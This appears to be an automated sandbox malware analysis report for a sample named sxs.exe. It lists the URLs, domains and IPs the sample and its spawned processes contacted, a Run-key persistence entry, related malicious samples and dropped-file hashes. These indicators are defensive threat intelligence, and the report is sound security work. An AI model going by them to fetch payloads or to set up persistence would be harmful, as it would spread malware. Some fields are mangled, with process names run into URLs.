                                  http://www.onefordvd.com/Wexplorer.exe, 0000000C.00000003.2676269391.000000000148B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2676620417.000000000148C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.dvdforone.com/Vhexplorer.exe, 0000002E.00000002.2804925525.0000000000544000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://1861119.com/ie.txt~sxs.exe, 00000000.00000002.2041399746.0000000000868000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.tw7890.com/twv/help.exesxs.exe, 00000000.00000003.2016130183.0000000000750000.00000040.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2177763585.00000000021F0000.00000040.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://1861119.com/ie.txtlatewuauclt.exe, 0000002A.00000003.2198638536.00000000005B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://1861119.com/1.txtnsssxs.exe, 00000000.00000002.2041399746.0000000000859000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.onefordvd.com/4b823explorer.exe, 00000005.00000003.2638770707.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2639171790.0000000000F60000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.onefordvd.comsxs.exe, 00000000.00000002.2041399746.000000000084B000.00000004.00000020.00020000.00000000.sdmp, sxs.exe, 00000000.00000002.2041399746.0000000000820000.00000004.00000020.00020000.00000000.sdmp, sxs.exe, 00000000.00000003.2035087789.0000000002175000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2043412825.0000000002908000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2043412825.0000000002900000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253732346.0000000002105000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253380639.000000000066E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2101961189.00000000029A8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2101961189.00000000029A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://msg.tmhacker.com/tean1.txt&wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.dvdforone.comC:wuauclt.exe, 0000002A.00000002.2235700906.0000000002220000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002D.00000002.2208846931.0000000000E60000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://1861119.com/index.exe3Nwuauclt.exe, 0000002A.00000002.2234954053.0000000000597000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.onefordvd.com/c%1explorer.exe, 00000003.00000002.2043412825.0000000002908000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.dvdforone.com/explorer.exe, 0000002E.00000003.2804551864.0000000000565000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002E.00000002.2804925525.0000000000533000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://msg.tmhacker.com/tean1.txtwuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234156390.00000000023B2000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  142.250.186.68
                                  		www.google.comUnited States
                                  		15169GOOGLEUSfalse
                                  216.58.206.38
                                  		ad.doubleclick.netUnited States
                                  		15169GOOGLEUSfalse
                                  54.174.215.77
                                  		gddomainparking.comUnited States
                                  		14618AMAZON-AESUSfalse
                                  104.26.2.70
                                  		unknownUnited States
                                  		13335CLOUDFLARENETUSfalse
                                  142.250.186.161
                                  		googlehosted.l.googleusercontent.comUnited States
                                  		15169GOOGLEUSfalse
                                  172.217.16.206
                                  		syndicatedsearch.googUnited States
                                  		15169GOOGLEUSfalse
                                  142.250.184.193
                                  		unknownUnited States
                                  		15169GOOGLEUSfalse
                                  172.67.69.19
                                  		ad-delivery.netUnited States
                                  		13335CLOUDFLARENETUSfalse
                                  15.197.204.56
                                  		www.onefordvd.comUnited States
                                  		7430TANDEMUSfalse
                                  172.67.41.60
                                  		btloader.comUnited States
                                  		13335CLOUDFLARENETUSfalse
                                  216.58.206.68
                                  		unknownUnited States
                                  		15169GOOGLEUSfalse
                                  239.255.255.250
                                  		unknownReserved
                                  		unknownunknownfalse
                                  142.250.186.166
                                  		unknownUnited States
                                  		15169GOOGLEUSfalse
                                  142.250.184.238
                                  		unknownUnited States
                                  		15169GOOGLEUSfalse

                                  Private

                                  IP
                                  192.168.2.4
                                  192.168.2.5

                                  General Information

                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1501290
                                  Start date and time:2024-08-29 17:11:21 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 6m 44s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Run name:Potential for more IOCs and behavior
                                  Number of analysed new started processes analysed:52
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:sxs.exe
                                  Detection:MAL
                                  Classification:mal100.spre.evad.winEXE@103/58@67/16
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 177
                                  • Number of non-executed functions: 44
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 142.250.185.195, 108.177.15.84, 142.250.184.206, 34.104.35.123, 23.38.98.114, 23.38.98.78, 142.250.185.130, 142.250.186.130, 199.232.214.172, 192.229.221.95, 216.58.206.35, 2.19.126.163, 142.250.185.206
                                  • Excluded domains from analysis (whitelisted): clients1.google.com, e40258.g.akamaiedge.net, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, partner.googleadservices.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com, global-wildcard.wsimg.com.sni-only.edgekey.net
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • VT rate limit hit for: sxs.exe

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  11:12:09API Interceptor4x Sleep call for process: sxs.exe modified
                                  11:12:14API Interceptor7x Sleep call for process: wuauclt.exe modified
                                  17:12:14AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Microsoft C:\Windows\wuauclt.exe

                                  LLM Input / Output

                                  InputOutput
                                  URL: https://www.onefordvd.com/lander Model: jbxai
                                  {
"brand":["onefordvd.com"],
"contains_trigger_text":false,
"prominent_button_name":"unknown",
"text_input_field_labels":["unknown"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  104.26.2.70https://www.msn.com/en-us/news/politics/sunday-meltdown-trump-floods-truth-social-with-photos-of-swifties-and-communists/ar-AA1p19A0?ocid=socialshare&cvid=d5d44c775cbf4f01a72d252af5f493ba&ei=19Get hashmaliciousUnknownBrowse
                                    http://boa.securemanage.comGet hashmaliciousUnknownBrowse
                                      http://lvjusd.org/Get hashmaliciousUnknownBrowse
                                        Wordle_x64LTS.exeGet hashmaliciousUnknownBrowse
                                          Wordle_x64LTS.exeGet hashmaliciousUnknownBrowse
                                            http://www.win365e.com/Get hashmaliciousUnknownBrowse
                                              https://download.freedownloadmanager.org/Windows-PC/TFTPUtil-GUI/FREE-1.4.5.html?ac5b752Get hashmaliciousUnknownBrowse
                                                https://circleoftoast.blogspot.comGet hashmaliciousUnknownBrowse
                                                  https://emurzhun.com/loop/Untitled/?id=84hsi4&p=page_1&c=1Get hashmaliciousUnknownBrowse
                                                    https://www.mediafire.com/file/25smb6ft3b8nwuu/instagram-crypto-ae.zip/fileGet hashmaliciousUnknownBrowse
                                                      172.67.69.19http://nxejt.polluxcastor.topGet hashmaliciousUnknownBrowse
                                                        http://boa.securemanage.comGet hashmaliciousUnknownBrowse
                                                          http://lvjusd.org/Get hashmaliciousUnknownBrowse
                                                            http://www.win365e.com/Get hashmaliciousUnknownBrowse
                                                              http://www.msftconnecttest.com/redirectGet hashmaliciousUnknownBrowse
                                                                https://forms.office.com/Pages/ResponsePage.aspx?id=ixYe6wDvPkeNXSKuSVctELRL0EP9_rpEhnIYJIDm_NBUMVdXQldMQUNWMVI4VkRRM0ZISFVEVUdGUy4uGet hashmaliciousUnknownBrowse
                                                                  http://ccns.usGet hashmaliciousUnknownBrowse
                                                                    https://www.mediafire.com/file/25smb6ft3b8nwuu/instagram-crypto-ae.zip/fileGet hashmaliciousUnknownBrowse
                                                                      http://meditch.parrish.comGet hashmaliciousUnknownBrowse
                                                                        https://circleoftoast.blogspot.comGet hashmaliciousUnknownBrowse
                                                                          15.197.204.56Document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                          • www.monos.shop/az1d/
                                                                          REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • www.monos.shop/6mno/
                                                                          ptsss.exeGet hashmaliciousFormBookBrowse
                                                                          • www.themix.tech/4m4m/
                                                                          AK4UlXhsnL.exeGet hashmaliciousUnknownBrowse
                                                                          • ww1.wthelpdesk.com/
                                                                          http://boa.securemanage.comGet hashmaliciousUnknownBrowse
                                                                          • boa.securemanage.com/lander
                                                                          00451.exeGet hashmaliciousFormBookBrowse
                                                                          • www.themix.tech/4m4m/
                                                                          Fzfee1Lgc2.elfGet hashmaliciousUnknownBrowse
                                                                          • yestergift.com/
                                                                          gUJak0onLk.elfGet hashmaliciousUnknownBrowse
                                                                          • thegreencuredispensaryandgrowgroup.us/
                                                                          Transfer copy.lnkGet hashmaliciousFormBookBrowse
                                                                          • www.barcelona-tourism.com/27rl/
                                                                          Local items and pay document.exeGet hashmaliciousFormBookBrowse
                                                                          • www.barcelona-tourism.com/27rl/?HpUtEh=U1eWGfqP6ckULtAlw9jnxm8Yo/DK/DPLbE+OKkNC9vYKlUN1/96fh64THZ1eiRJ3vpNl11QGDSP5SqGINm9vao48yybPMI74v6O949OYb6tDe/GiyQ==&G2A=JHe0kn

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          btloader.comhttps://yoge0104.github.io/Yoge0104Get hashmaliciousHTMLPhisherBrowse
                                                                          • 130.211.23.194
                                                                          https://www.msn.com/en-us/news/politics/sunday-meltdown-trump-floods-truth-social-with-photos-of-swifties-and-communists/ar-AA1p19A0?ocid=socialshare&cvid=d5d44c775cbf4f01a72d252af5f493ba&ei=19Get hashmaliciousUnknownBrowse
                                                                          • 130.211.23.194
                                                                          http://nxejt.polluxcastor.topGet hashmaliciousUnknownBrowse
                                                                          • 130.211.23.194
                                                                          http://boa.securemanage.comGet hashmaliciousUnknownBrowse
                                                                          • 104.22.75.216
                                                                          Monica_velez Scan to View CourtOrder.docxGet hashmaliciousUnknownBrowse
                                                                          • 130.211.23.194
                                                                          http://lvjusd.org/Get hashmaliciousUnknownBrowse
                                                                          • 172.67.41.60
                                                                          http://www.win365e.com/Get hashmaliciousUnknownBrowse
                                                                          • 104.22.75.216
                                                                          http://d.3656240128.xyz/Get hashmaliciousUnknownBrowse
                                                                          • 104.22.75.216
                                                                          https://download.freedownloadmanager.org/Windows-PC/TFTPUtil-GUI/FREE-1.4.5.html?ac5b752Get hashmaliciousUnknownBrowse
                                                                          • 130.211.23.194
                                                                          http://www.msftconnecttest.com/redirectGet hashmaliciousUnknownBrowse
                                                                          • 172.67.41.60
                                                                          gddomainparking.comhttp://boa.securemanage.comGet hashmaliciousUnknownBrowse
                                                                          • 54.88.28.143
                                                                          http://lvjusd.org/Get hashmaliciousUnknownBrowse
                                                                          • 18.214.32.149
                                                                          http://www.win365e.com/Get hashmaliciousUnknownBrowse
                                                                          • 54.85.39.100
                                                                          http://d.3656240128.xyz/Get hashmaliciousUnknownBrowse
                                                                          • 54.85.39.100
                                                                          https://circleoftoast.blogspot.comGet hashmaliciousUnknownBrowse
                                                                          • 54.221.247.211
                                                                          http://ccns.usGet hashmaliciousUnknownBrowse
                                                                          • 18.207.29.188
                                                                          http://kuurza.comGet hashmaliciousUnknownBrowse
                                                                          • 44.194.65.105
                                                                          https://googie-anaiytics.comGet hashmaliciousUnknownBrowse
                                                                          • 44.194.65.105
                                                                          http://meditch.parrish.comGet hashmaliciousUnknownBrowse
                                                                          • 54.86.18.112
                                                                          http://www6.parrish.comGet hashmaliciousUnknownBrowse
                                                                          • 34.226.66.111
                                                                          ad-delivery.nethttps://sjq4p0lz.r.us-east-1.awstrack.me/L0/https:%2F%2Fwww.howtogeek.com%2F%3Futm_medium=newsletter%26utm_campaign=HTG-202408281159%26utm_source=HTG-NL%26user=am9obi53aW5kQGVwcmVtaXVtLmNvbQ%26lctg=7c0d2c3042ca45dcc1d0360b05cf7ed73c0a503df62a4d7921a3eb742c01cab5/1/010001919a125aa7-c1b4578c-8e1f-4667-8509-677bedec8ac0-000000/XnQZD8ewfocpYq5Ry0SP_pMdhr0=389Get hashmaliciousUnknownBrowse
                                                                          • 104.26.2.70
                                                                          https://www.scribd.com/document/762765489/Advice-Notification#fullscreen&from_embedGet hashmaliciousUnknownBrowse
                                                                          • 104.26.3.70
                                                                          https://www.msn.com/en-us/news/politics/sunday-meltdown-trump-floods-truth-social-with-photos-of-swifties-and-communists/ar-AA1p19A0?ocid=socialshare&cvid=d5d44c775cbf4f01a72d252af5f493ba&ei=19Get hashmaliciousUnknownBrowse
                                                                          • 104.26.3.70
                                                                          http://nxejt.polluxcastor.topGet hashmaliciousUnknownBrowse
                                                                          • 104.26.3.70
                                                                          http://radio-en-ligne.frGet hashmaliciousUnknownBrowse
                                                                          • 104.26.3.70
                                                                          https://pivotanimator.net/Download.phpGet hashmaliciousUnknownBrowse
                                                                          • 104.26.3.70
                                                                          http://boa.securemanage.comGet hashmaliciousUnknownBrowse
                                                                          • 172.67.69.19
                                                                          Monica_velez Scan to View CourtOrder.docxGet hashmaliciousUnknownBrowse
                                                                          • 104.26.2.70
                                                                          http://lvjusd.org/Get hashmaliciousUnknownBrowse
                                                                          • 172.67.69.19
                                                                          Wordle_x64LTS.exeGet hashmaliciousUnknownBrowse
                                                                          • 104.26.2.70
                                                                          google.comhttp://www.water-filter.comGet hashmaliciousHTMLPhisherBrowse
                                                                          • 142.250.186.174
                                                                          https://t4w86zlc.r.sa-east-1.awstrack.me/L0/https:%2F%2Fdeverechemicals3.s3.amazonaws.com%2FDeveres3project002files.htm/1/010301919a36c887-bd0fadb9-69a9-4c66-8a65-7770fcfd1a1e-000000/4liC3XgeimVwv5ob78Q6Bl4nESk=173Get hashmaliciousHTMLPhisherBrowse
                                                                          • 142.250.186.68
                                                                          http://econltractors.comGet hashmaliciousHTMLPhisherBrowse
                                                                          • 216.58.206.68
                                                                          http://general72.s3-website.us-east-2.amazonaws.comGet hashmaliciousUnknownBrowse
                                                                          • 142.250.185.68
                                                                          https://rebrand.ly/340957Get hashmaliciousUnknownBrowse
                                                                          • 142.250.185.132
                                                                          http://premium.davidabostic.comGet hashmaliciousUnknownBrowse
                                                                          • 142.250.186.164
                                                                          https://elc-path.com/pdfglobal2/docs89q9eqwwe/login.php#wa=wsignin1.0&rpsnv=13&ct=1539585327&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fnlp%3d1%26RpsCsrfState%3d715d44a2-2f11-4282-f625-a066679e96e2&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015Get hashmaliciousHTMLPhisherBrowse
                                                                          • 142.250.185.132
                                                                          https://gocloud.co.ke/ShareDocu.php/?email=cmFjaGVsakBjb21wbHl3b3Jrcy5jb20=Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                          • 142.250.74.196
                                                                          https://piclut.com/n/?c3Y9bzM2NV8xX29uZSZyYW5kPWNrcHVSM2s9JnVpZD1VU0VSMjkwNzIwMjRVMTgwNzI5MDA=Get hashmaliciousUnknownBrowse
                                                                          • 142.250.184.228
                                                                          Message-ID 08282024 110831 PM.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                          • 216.58.206.68

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          AMAZON-AESUShttp://www.water-filter.comGet hashmaliciousHTMLPhisherBrowse
                                                                          • 44.215.136.61
                                                                          http://general72.s3-website.us-east-2.amazonaws.comGet hashmaliciousUnknownBrowse
                                                                          • 34.233.69.206
                                                                          https://rebrand.ly/340957Get hashmaliciousUnknownBrowse
                                                                          • 44.194.6.80
                                                                          SecuriteInfo.com.Linux.Siggen.9999.6015.2041.elfGet hashmaliciousMiraiBrowse
                                                                          • 54.57.56.247
                                                                          IDM_ACT.exeGet hashmaliciousFredy StealerBrowse
                                                                          • 34.199.23.206
                                                                          IDM_ACT.exeGet hashmaliciousFredy StealerBrowse
                                                                          • 34.199.23.206
                                                                          https://set.page/cdtautomotive/Get hashmaliciousUnknownBrowse
                                                                          • 52.4.215.28
                                                                          https://tinyurl.com/NDCEuropeGet hashmaliciousUnknownBrowse
                                                                          • 3.221.57.65
                                                                          OJO!!! No lo he abiertoFwd_ Message From 646___xbx2.emlGet hashmaliciousUnknownBrowse
                                                                          • 18.207.85.246
                                                                          https://eu-files.jotform.com/jufs/Balciunas/form_files/mayeri.66cdabd2a5f975.43943309.pdf?md5=MSrOXntTEwGBrCuETzXGIw&expires=1724764002Get hashmaliciousUnknownBrowse
                                                                          • 52.5.13.197
                                                                          CLOUDFLARENETUShttp://www.water-filter.comGet hashmaliciousHTMLPhisherBrowse
                                                                          • 104.18.15.188
                                                                          https://t4w86zlc.r.sa-east-1.awstrack.me/L0/https:%2F%2Fdeverechemicals3.s3.amazonaws.com%2FDeveres3project002files.htm/1/010301919a36c887-bd0fadb9-69a9-4c66-8a65-7770fcfd1a1e-000000/4liC3XgeimVwv5ob78Q6Bl4nESk=173Get hashmaliciousHTMLPhisherBrowse
                                                                          • 104.17.25.14
                                                                          http://econltractors.comGet hashmaliciousHTMLPhisherBrowse
                                                                          • 172.67.209.24
                                                                          https://rebrand.ly/340957Get hashmaliciousUnknownBrowse
                                                                          • 1.1.1.1
                                                                          0VCartoonizer_Trial.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.28.66
                                                                          eSLlhErJ0q.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                          • 172.67.147.32
                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                          • 172.64.41.3
                                                                          Page1.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                          • 104.26.13.205
                                                                          https://elc-path.com/pdfglobal2/docs89q9eqwwe/login.php#wa=wsignin1.0&rpsnv=13&ct=1539585327&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fnlp%3d1%26RpsCsrfState%3d715d44a2-2f11-4282-f625-a066679e96e2&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015Get hashmaliciousHTMLPhisherBrowse
                                                                          • 104.17.25.14
                                                                          0Subtitle Edit.exeGet hashmaliciousLummaCBrowse
                                                                          • 188.114.96.3
                                                                          CLOUDFLARENETUShttp://www.water-filter.comGet hashmaliciousHTMLPhisherBrowse
                                                                          • 104.18.15.188
                                                                          https://t4w86zlc.r.sa-east-1.awstrack.me/L0/https:%2F%2Fdeverechemicals3.s3.amazonaws.com%2FDeveres3project002files.htm/1/010301919a36c887-bd0fadb9-69a9-4c66-8a65-7770fcfd1a1e-000000/4liC3XgeimVwv5ob78Q6Bl4nESk=173Get hashmaliciousHTMLPhisherBrowse
                                                                          • 104.17.25.14
                                                                          http://econltractors.comGet hashmaliciousHTMLPhisherBrowse
                                                                          • 172.67.209.24
                                                                          https://rebrand.ly/340957Get hashmaliciousUnknownBrowse
                                                                          • 1.1.1.1
                                                                          0VCartoonizer_Trial.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.28.66
                                                                          eSLlhErJ0q.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                          • 172.67.147.32
                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                          • 172.64.41.3
                                                                          Page1.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                          • 104.26.13.205
                                                                          https://elc-path.com/pdfglobal2/docs89q9eqwwe/login.php#wa=wsignin1.0&rpsnv=13&ct=1539585327&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fnlp%3d1%26RpsCsrfState%3d715d44a2-2f11-4282-f625-a066679e96e2&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015Get hashmaliciousHTMLPhisherBrowse
                                                                          • 104.17.25.14
                                                                          0Subtitle Edit.exeGet hashmaliciousLummaCBrowse
                                                                          • 188.114.96.3
                                                                          TANDEMUShttps://rebrand.ly/340957Get hashmaliciousUnknownBrowse
                                                                          • 15.197.137.111
                                                                          Document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                          • 15.197.204.56
                                                                          REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 15.197.204.56
                                                                          mbda-us.comAudiowav012.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                          • 15.197.193.217
                                                                          Vertexgroup#Signature.pdfGet hashmaliciousUnknownBrowse
                                                                          • 15.197.217.88
                                                                          https://we.tl/t-RErWU1YgQSGet hashmaliciousUnknownBrowse
                                                                          • 15.197.193.217
                                                                          AIDHL3290435890.exeGet hashmaliciousFormBookBrowse
                                                                          • 15.197.204.56
                                                                          https://energyservices.org/Get hashmaliciousHTMLPhisherBrowse
                                                                          • 15.197.193.217
                                                                          http://chengduyiwokeji-haiwai.datasink.datasjourney.comGet hashmaliciousUnknownBrowse
                                                                          • 15.197.193.217
                                                                          http://start.xyzGet hashmaliciousUnknownBrowse
                                                                          • 15.197.162.184

                                                                          JA3 Fingerprints

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          1138de370e523e824bbca92d049a3777http://general72.s3-website.us-east-2.amazonaws.comGet hashmaliciousUnknownBrowse
                                                                          • 23.1.237.91
                                                                          http://premium.davidabostic.comGet hashmaliciousUnknownBrowse
                                                                          • 23.1.237.91
                                                                          https://gocloud.co.ke/ShareDocu.php/?email=cmFjaGVsakBjb21wbHl3b3Jrcy5jb20=Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                          • 23.1.237.91
                                                                          https://set.page/cdtautomotive/Get hashmaliciousUnknownBrowse
                                                                          • 23.1.237.91
                                                                          Invoice.htmGet hashmaliciousHTMLPhisherBrowse
                                                                          • 23.1.237.91
                                                                          https://tinyurl.com/NDCEuropeGet hashmaliciousUnknownBrowse
                                                                          • 23.1.237.91
                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                          • 23.1.237.91
                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                          • 23.1.237.91
                                                                          hdel.co.kr PURCHASE ORDER.htmlGet hashmaliciousUnknownBrowse
                                                                          • 23.1.237.91
                                                                          https://rtgrents.helplook.com/docs/RTGRENTS?preview=1Get hashmaliciousHTMLPhisherBrowse
                                                                          • 23.1.237.91
                                                                          28a2c9bd18a11de089ef85a160da29e4http://www.water-filter.comGet hashmaliciousHTMLPhisherBrowse
                                                                          • 52.165.165.26
                                                                          • 184.28.90.27
                                                                          http://econltractors.comGet hashmaliciousHTMLPhisherBrowse
                                                                          • 52.165.165.26
                                                                          • 184.28.90.27
                                                                          http://general72.s3-website.us-east-2.amazonaws.comGet hashmaliciousUnknownBrowse
                                                                          • 52.165.165.26
                                                                          • 184.28.90.27
                                                                          http://premium.davidabostic.comGet hashmaliciousUnknownBrowse
                                                                          • 52.165.165.26
                                                                          • 184.28.90.27
                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                          • 52.165.165.26
                                                                          • 184.28.90.27
                                                                          https://elc-path.com/pdfglobal2/docs89q9eqwwe/login.php#wa=wsignin1.0&rpsnv=13&ct=1539585327&rver=7.0.6737.0&wp=MBI_SSL&wreply=https%3a%2f%2foutlook.live.com%2fowa%2f%3fnlp%3d1%26RpsCsrfState%3d715d44a2-2f11-4282-f625-a066679e96e2&id=292841&CBCXT=out&lw=1&fl=dob%2cflname%2cwld&cobrandid=90015Get hashmaliciousHTMLPhisherBrowse
                                                                          • 52.165.165.26
                                                                          • 184.28.90.27
                                                                          https://gocloud.co.ke/ShareDocu.php/?email=cmFjaGVsakBjb21wbHl3b3Jrcy5jb20=Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                          • 52.165.165.26
                                                                          • 184.28.90.27
                                                                          https://piclut.com/n/?c3Y9bzM2NV8xX29uZSZyYW5kPWNrcHVSM2s9JnVpZD1VU0VSMjkwNzIwMjRVMTgwNzI5MDA=Get hashmaliciousUnknownBrowse
                                                                          • 52.165.165.26
                                                                          • 184.28.90.27
                                                                          Message-ID 08282024 110831 PM.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                          • 52.165.165.26
                                                                          • 184.28.90.27
                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                          • 52.165.165.26
                                                                          • 184.28.90.27

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 29 14:12:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2677
                                                                          Entropy (8bit):3.975415214414023
                                                                          Encrypted:false
                                                                          SSDEEP:48:8GdtT1tJwHRidAKZdA19ehwiZUklqehSy+3:8M/JSFy
                                                                          MD5:F70DD38B7952DFC2B61F5BAD3D0CE910
                                                                          SHA1:6E71D4841571458BB2E79466A2D89130F911C73F
                                                                          SHA-256:71CF27BB8987B2ED0C22C33189123C5CE95E0CE5FCE08377B19F79D93C4E1B52
                                                                          SHA-512:747F4F8A18F013C8AC38F86A1FAB511250ED2749BD449933E20773DD5F56175F6D3B22A09812833A16610A9B278282C29545C4695A1B541FB77C714EE07186FD
                                                                          Malicious:false
